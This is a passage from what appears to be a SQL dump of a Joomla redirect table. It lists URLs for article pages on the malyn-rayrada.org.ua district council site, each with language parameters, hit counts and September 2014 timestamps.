00:00:00',301),(4624,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-25 03:57:40','0000-00-00 00:00:00',301),(4625,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-25 04:11:26','0000-00-00 00:00:00',301),(4626,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=ru','','','',3,0,'2014-09-25 04:30:03','0000-00-00 00:00:00',301),(4627,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-25 04:31:07','0000-00-00 00:00:00',301),(4628,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-25 04:31:22','0000-00-00 00:00:00',301),(4629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-25 04:35:43','0000-00-00 00:00:00',301),(4630,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-25 04:51:54','0000-00-00 00:00:00',301),(4631,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=ru','','','',3,0,'2014-09-25 04:57:57','0000-00-00 00:00:00',301),(4632,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-25 05:31:22','0000-00-00 00:00:00',301),(4633,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-25 05:32:52','0000-00-00 00:00:00',301),(4634,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-25 06:15:01','0000-00-00 00:00:00',301),(4635,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56&Itemid=97&lang=en','','','',8,0,'2014-09-25 06:53:12','0000-00-00 00:00:00',301),(4636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-25 06:55:07','0000-00-00 00:00:00',301),(4637,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-25 06:57:31','0000-00-00 00:00:00',301),(4638,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=uk','','','',2,0,'2014-09-25 07:00:17','0000-00-00 00:00:00',301),(4639,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=en','','','',2,0,'2014-09-25 07:01:19','0000-00-00 00:00:00',301),(4640,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=en','','','',5,0,'2014-09-25 07:13:49','0000-00-00 00:00:00',301),(4641,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-25 07:29:47','0000-00-00 00:00:00',301),(4642,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=en&Itemid=','','','',7,0,'2014-09-25 07:35:17','0000-00-00 00:00:00',301),(4643,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-25 08:08:23','0000-00-00 00:00:00',301),(4644,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-25 09:08:32','0000-00-00 00:00:00',301),(4645,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-25 09:53:56','0000-00-00 00:00:00',301),(4646,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-25 09:53:59','0000-00-00 00:00:00',301),(4647,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-25 09:54:07','0000-00-00 00:00:00',301),(4648,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-25 09:54:14','0000-00-00 00:00:00',301),(4649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=893:-2013-2014-&catid=47:--21022013-&Itemid=86&lang=en','','','',1,0,'2014-09-25 10:08:21','0000-00-00 00:00:00',301),(4650,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1259:1&catid=10&Itemid=17&lang=uk','','','',6,0,'2014-09-25 10:08:28','0000-00-00 00:00:00',301),(4651,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&Itemid=92&lang=ru','','','',1,0,'2014-09-25 10:10:30','0000-00-00 00:00:00',301),(4652,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&Itemid=92&lang=uk','','','',1,0,'2014-09-25 10:10:31','0000-00-00 00:00:00',301),(4653,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51:--19072013-&Itemid=92&lang=uk','','','',5,0,'2014-09-25 10:10:32','0000-00-00 00:00:00',301),(4654,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&Itemid=92&lang=uk','','','',1,0,'2014-09-25 10:10:33','0000-00-00 00:00:00',301),(4655,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51:--19072013-&Itemid=92&lang=uk','','','',3,0,'2014-09-25 10:10:34','0000-00-00 00:00:00',301),(4656,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&Itemid=92&lang=ru','','','',2,0,'2014-09-25 10:10:35','0000-00-00 00:00:00',301),(4657,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&Itemid=92&lang=uk','','','',2,0,'2014-09-25 10:10:36','0000-00-00 00:00:00',301),(4658,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&Itemid=70&lang=ru','','','',1,0,'2014-09-25 10:10:37','0000-00-00 00:00:00',301),(4659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&Itemid=70&lang=uk','','','',1,0,'2014-09-25 10:10:38','0000-00-00 00:00:00',301),(4660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&lang=uk&Itemid=0','','','',1,0,'2014-09-25 10:10:40','0000-00-00 00:00:00',301),(4661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&lang=uk&Itemid=','','','',1,0,'2014-09-25 10:10:42','0000-00-00 00:00:00',301),(4662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&lang=ru&Itemid=0','','','',1,0,'2014-09-25 10:10:43','0000-00-00 00:00:00',301),(4663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&lang=ru&Itemid=','','','',1,0,'2014-09-25 10:10:44','0000-00-00 00:00:00',301),(4664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&Itemid=14&lang=en','','','',1,0,'2014-09-25 10:10:46','0000-00-00 00:00:00',301),(4665,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&lang=ru','','','',1,0,'2014-09-25 10:10:52','0000-00-00 00:00:00',301),(4666,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&Itemid=14&lang=en','','','',1,0,'2014-09-25 10:10:53','0000-00-00 00:00:00',301),(4667,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&lang=ru&Itemid=','','','',1,0,'2014-09-25 10:10:55','0000-00-00 00:00:00',301),(4668,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1008:2013-05-20-07-02-57&Itemid=14&lang=ru','','','',1,0,'2014-09-25 10:11:00','0000-00-00 00:00:00',301),(4669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1008:2013-05-20-07-02-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-25 10:11:01','0000-00-00 00:00:00',301),(4670,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&Itemid=14&lang=en','','','',1,0,'2014-09-25 10:11:01','0000-00-00 00:00:00',301),(4671,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&lang=uk&Itemid=','','','',1,0,'2014-09-25 10:11:03','0000-00-00 00:00:00',301),(4672,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=57&Itemid=98&lang=ru','','','',3,0,'2014-09-25 10:11:05','0000-00-00 00:00:00',301),(4673,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&lang=uk','','','',1,0,'2014-09-25 10:11:06','0000-00-00 00:00:00',301),(4674,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&lang=ru','','','',1,0,'2014-09-25 10:11:06','0000-00-00 00:00:00',301),(4675,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&Itemid=14&lang=en','','','',1,0,'2014-09-25 10:11:07','0000-00-00 00:00:00',301),(4676,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&lang=uk','','','',2,0,'2014-09-25 10:11:07','0000-00-00 00:00:00',301),(4677,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&Itemid=14&lang=en','','','',2,0,'2014-09-25 10:11:08','0000-00-00 00:00:00',301),(4678,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&lang=uk','','','',1,0,'2014-09-25 10:11:09','0000-00-00 00:00:00',301),(4679,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&Itemid=70&lang=ru','','','',1,0,'2014-09-25 10:11:49','0000-00-00 00:00:00',301),(4680,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&Itemid=92&lang=en','','','',1,0,'2014-09-25 10:11:52','0000-00-00 00:00:00',301),(4681,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-09-25 10:11:55','0000-00-00 00:00:00',301),(4682,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&Itemid=92&lang=en','','','',1,0,'2014-09-25 10:11:57','0000-00-00 00:00:00',301),(4683,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=51:--19072013-&Itemid=92&lang=uk','','','',2,0,'2014-09-25 10:11:59','0000-00-00 00:00:00',301),(4684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&Itemid=14&lang=ru','','','',1,0,'2014-09-25 10:12:05','0000-00-00 00:00:00',301),(4685,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1016:2013-06-03-11-41-36&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-09-25 10:12:06','0000-00-00 00:00:00',301),(4686,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&Itemid=14&lang=uk','','','',1,0,'2014-09-25 10:12:09','0000-00-00 00:00:00',301),(4687,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1010:-22-6-&Itemid=14&lang=en','','','',1,0,'2014-09-25 10:12:10','0000-00-00 00:00:00',301),(4688,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&Itemid=14&lang=ru','','','',1,0,'2014-09-25 10:12:11','0000-00-00 00:00:00',301),(4689,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1004:2013-05-04-11-41-00&Itemid=14&lang=en','','','',1,0,'2014-09-25 10:12:13','0000-00-00 00:00:00',301),(4690,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&lang=uk','','','',1,0,'2014-09-25 10:12:23','0000-00-00 00:00:00',301),(4691,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&Itemid=14&lang=uk','','','',2,0,'2014-09-25 10:12:27','0000-00-00 00:00:00',301),(4692,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-25 10:12:28','0000-00-00 00:00:00',301),(4693,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&Itemid=14&lang=ru','','','',1,0,'2014-09-25 10:12:32','0000-00-00 00:00:00',301),(4694,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&lang=ru&Itemid=','','','',1,0,'2014-09-25 10:12:32','0000-00-00 00:00:00',301),(4695,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&Itemid=70&lang=ru','','','',1,0,'2014-09-25 10:12:33','0000-00-00 00:00:00',301),(4696,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&lang=en&Itemid=0','','','',1,0,'2014-09-25 10:12:34','0000-00-00 00:00:00',301),(4697,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-------lr---&Itemid=70&lang=uk','','','',1,0,'2014-09-25 10:12:34','0000-00-00 00:00:00',301),(4698,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&Itemid=14&lang=uk','','','',2,0,'2014-09-25 10:12:36','0000-00-00 00:00:00',301),(4699,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&Itemid=70&lang=uk','','','',1,0,'2014-09-25 10:12:36','0000-00-00 00:00:00',301),(4700,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-------l---28r-&Itemid=70&lang=ru','','','',1,0,'2014-09-25 10:12:37','0000-00-00 00:00:00',301),(4701,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&Itemid=70&lang=ru','','','',1,0,'2014-09-25 10:12:38','0000-00-00 00:00:00',301),(4702,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51&Itemid=92&lang=uk','','','',5,0,'2014-09-25 10:12:41','0000-00-00 00:00:00',301),(4703,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:------------2011-2015-&Itemid=70&lang=en','','','',1,0,'2014-09-25 10:12:42','0000-00-00 00:00:00',301),(4704,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&Itemid=70&lang=uk','','','',1,0,'2014-09-25 10:12:43','0000-00-00 00:00:00',301),(4705,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51:--19072013-&Itemid=92&lang=en','','','',5,0,'2014-09-25 10:12:44','0000-00-00 00:00:00',301),(4706,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&Itemid=92&lang=ru','','','',1,0,'2014-09-25 10:12:46','0000-00-00 00:00:00',301),(4707,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&Itemid=92&lang=uk','','','',1,0,'2014-09-25 10:12:47','0000-00-00 00:00:00',301),(4708,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&Itemid=92&lang=uk','','','',2,0,'2014-09-25 10:12:48','0000-00-00 00:00:00',301),(4709,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&Itemid=92&lang=ru','','','',2,0,'2014-09-25 10:12:50','0000-00-00 00:00:00',301),(4710,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&lang=uk','','','',1,0,'2014-09-25 10:12:53','0000-00-00 00:00:00',301),(4711,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&lang=en','','','',2,0,'2014-09-25 10:12:55','0000-00-00 00:00:00',301),(4712,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&Itemid=14&lang=ru','','','',1,0,'2014-09-25 10:12:59','0000-00-00 00:00:00',301),(4713,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&Itemid=14&lang=ru','','','',2,0,'2014-09-25 10:13:01','0000-00-00 00:00:00',301),(4714,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&Itemid=14&lang=en','','','',1,0,'2014-09-25 10:13:05','0000-00-00 00:00:00',301),(4715,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&Itemid=14&lang=ru','','','',1,0,'2014-09-25 10:13:07','0000-00-00 00:00:00',301),(4716,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&lang=uk&Itemid=','','','',1,0,'2014-09-25 10:13:09','0000-00-00 00:00:00',301),(4717,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&lang=ru&Itemid=','','','',1,0,'2014-09-25 10:13:10','0000-00-00 00:00:00',301),(4718,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&lang=en','','','',1,0,'2014-09-25 10:13:12','0000-00-00 00:00:00',301),(4719,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1010:-22-6-&lang=uk','','','',1,0,'2014-09-25 10:13:13','0000-00-00 00:00:00',301),(4720,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&Itemid=14&lang=uk','','','',1,0,'2014-09-25 10:13:13','0000-00-00 00:00:00',301),(4721,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1009:2013-05-24-09-23-50&Itemid=14&lang=uk','','','',2,0,'2014-09-25 10:13:58','0000-00-00 00:00:00',301),(4722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1009:2013-05-24-09-23-50&lang=en','','','',1,0,'2014-09-25 10:14:00','0000-00-00 00:00:00',301),(4723,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1008:2013-05-20-07-02-57&lang=en&Itemid=','','','',1,0,'2014-09-25 10:14:03','0000-00-00 00:00:00',301),(4724,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&lang=uk','','','',1,0,'2014-09-25 10:14:05','0000-00-00 00:00:00',301),(4725,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&lang=ru','','','',2,0,'2014-09-25 10:14:06','0000-00-00 00:00:00',301),(4726,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&lang=uk','','','',1,0,'2014-09-25 10:14:09','0000-00-00 00:00:00',301),(4727,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&lang=ru','','','',2,0,'2014-09-25 10:14:15','0000-00-00 00:00:00',301),(4728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&lang=ru&Itemid=0','','','',1,0,'2014-09-25 10:14:18','0000-00-00 00:00:00',301),(4729,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&Itemid=14&lang=uk','','','',2,0,'2014-09-25 10:14:19','0000-00-00 00:00:00',301),(4730,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&Itemid=14&lang=ru','','','',1,0,'2014-09-25 10:14:23','0000-00-00 00:00:00',301),(4731,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&lang=uk&Itemid=0','','','',1,0,'2014-09-25 10:14:24','0000-00-00 00:00:00',301),(4732,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&lang=uk','','','',1,0,'2014-09-25 10:14:25','0000-00-00 00:00:00',301),(4733,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&lang=ru','','','',1,0,'2014-09-25 10:14:26','0000-00-00 00:00:00',301),(4734,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1014:2013-06-03-06-43-44&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-09-25 10:15:27','0000-00-00 00:00:00',301),(4735,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1014:2013-06-03-06-43-44&lang=en&Itemid=','','','',1,0,'2014-09-25 10:15:31','0000-00-00 00:00:00',301),(4736,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&lang=uk&Itemid=','','','',1,0,'2014-09-25 10:15:33','0000-00-00 00:00:00',301),(4737,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&lang=ru&Itemid=','','','',1,0,'2014-09-25 10:15:34','0000-00-00 00:00:00',301),(4738,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&lang=en&Itemid=0','','','',1,0,'2014-09-25 10:15:35','0000-00-00 00:00:00',301),(4739,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&Itemid=14&lang=en','','','',2,0,'2014-09-25 10:15:38','0000-00-00 00:00:00',301),(4740,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=ru','','','',3,0,'2014-09-25 10:15:41','0000-00-00 00:00:00',301),(4741,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&Itemid=70&lang=en','','','',1,0,'2014-09-25 10:15:46','0000-00-00 00:00:00',301),(4742,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&lang=en&Itemid=','','','',1,0,'2014-09-25 10:15:48','0000-00-00 00:00:00',301),(4743,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&Itemid=92&lang=ru','','','',1,0,'2014-09-25 10:15:49','0000-00-00 00:00:00',301),(4744,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&Itemid=92&lang=uk','','','',1,0,'2014-09-25 10:15:50','0000-00-00 00:00:00',301),(4745,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&Itemid=92&lang=en','','','',2,0,'2014-09-25 10:15:52','0000-00-00 00:00:00',301),(4746,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-------l-r--2012-2015-&Itemid=70&lang=uk','','','',1,0,'2014-09-25 10:15:53','0000-00-00 00:00:00',301),(4747,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-------l-r--2012-2015-&Itemid=70&lang=ru','','','',1,0,'2014-09-25 10:15:54','0000-00-00 00:00:00',301),(4748,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&Itemid=92&lang=en','','','',1,0,'2014-09-25 10:15:56','0000-00-00 00:00:00',301),(4749,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&Itemid=92&lang=ru','','','',1,0,'2014-09-25 10:15:58','0000-00-00 00:00:00',301),(4750,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=51&Itemid=92&lang=uk','','','',5,0,'2014-09-25 10:15:59','0000-00-00 00:00:00',301),(4751,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&Itemid=92&lang=uk','','','',2,0,'2014-09-25 10:16:01','0000-00-00 00:00:00',301),(4752,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&Itemid=92&lang=en','','','',1,0,'2014-09-25 10:16:03','0000-00-00 00:00:00',301),(4753,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-------lr---&Itemid=70&lang=en','','','',1,0,'2014-09-25 10:21:35','0000-00-00 00:00:00',301),(4754,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&Itemid=92&lang=uk','','','',2,0,'2014-09-25 10:21:36','0000-00-00 00:00:00',301),(4755,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-------l---28r-&Itemid=70&lang=en','','','',1,0,'2014-09-25 10:21:38','0000-00-00 00:00:00',301),(4756,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:------------2011-2015-&Itemid=70&lang=ru','','','',1,0,'2014-09-25 10:21:40','0000-00-00 00:00:00',301),(4757,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=51&Itemid=92&lang=uk','','','',2,0,'2014-09-25 10:21:41','0000-00-00 00:00:00',301),(4758,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&Itemid=92&lang=en','','','',1,0,'2014-09-25 10:21:45','0000-00-00 00:00:00',301),(4759,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&Itemid=92&lang=en','','','',2,0,'2014-09-25 10:21:47','0000-00-00 00:00:00',301),(4760,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&Itemid=92&lang=en','','','',2,0,'2014-09-25 10:21:48','0000-00-00 00:00:00',301),(4761,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=uk','','','',4,0,'2014-09-25 10:21:52','0000-00-00 00:00:00',301),(4762,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=ru','','','',3,0,'2014-09-25 10:21:53','0000-00-00 00:00:00',301),(4763,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&Itemid=14&lang=en','','','',1,0,'2014-09-25 10:21:58','0000-00-00 00:00:00',301),(4764,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&lang=uk','','','',1,0,'2014-09-25 10:21:59','0000-00-00 00:00:00',301),(4765,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&lang=ru','','','',1,0,'2014-09-25 10:22:01','0000-00-00 00:00:00',301),(4766,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-25 10:22:02','0000-00-00 00:00:00',301),(4767,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&lang=en','','','',1,0,'2014-09-25 10:22:03','0000-00-00 00:00:00',301),(4768,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&lang=ru&Itemid=0','','','',1,0,'2014-09-25 10:26:10','0000-00-00 00:00:00',301),(4769,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-09-25 10:26:12','0000-00-00 00:00:00',301),(4770,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&lang=en','','','',2,0,'2014-09-25 10:26:13','0000-00-00 